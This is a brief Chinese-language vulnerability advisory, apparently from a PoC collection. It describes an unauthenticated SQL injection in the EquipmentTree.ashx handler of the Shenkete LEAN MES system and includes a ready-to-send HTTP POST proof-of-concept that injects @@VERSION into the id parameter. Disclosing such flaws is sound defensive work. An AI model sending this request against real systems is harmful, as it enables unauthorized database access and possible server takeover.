漏洞描述
深科特LEAN MES系统 EquipmentTree.ashx 接口存在SQL注入漏洞,未经身份验证的恶意攻击者利用 SQL注入漏洞获取数据库中的信息(例如管理员后台密码、站点用户个人信息)之外,攻击者甚至可以在高权限下向服务器写入命令,进一步获取服务器系统权限。
深科特LEAN MES系统 EquipmentTree.ashx 存在SQL注入漏洞
PoC代码
POST /Handler/EquipmentTree.ashx HTTP/1.1
Host:
Accept-Encoding: gzip
Connection: keep-alive
Content-Length: 12
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.1307.119 Safari/537.36
id=@@VERSION